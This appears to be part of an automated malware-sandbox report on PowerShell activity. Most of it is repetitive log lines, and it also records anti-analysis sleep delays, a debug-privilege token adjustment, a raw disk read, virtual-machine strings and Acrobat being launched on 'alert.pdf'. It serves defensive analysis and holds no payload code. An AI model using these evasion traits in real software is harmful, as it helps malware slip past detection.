Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF5FEA push eax; retf 13_2_00007FF887CF5FEB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF7C5E push eax; retf 13_2_00007FF887CF7C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF845E push eax; ret 13_2_00007FF887CF846D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF63FA pushad ; iretd 13_2_00007FF887CF63FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF7C2E pushad ; retf 13_2_00007FF887CF7C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF842E pushad ; ret 13_2_00007FF887CF845D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF63EA push eax; iretd 13_2_00007FF887CF63EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4839Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5002Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4567Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5041Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7312Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4580Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4680Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: powershell.exe, 00000001.00000002.1504426551.0000024FEBD0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: svchost.exe, 00000006.00000002.2611740232.000001EC4A42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2613071235.000001EC4FA58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000D.00000002.1631353048.0000022EBA349000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
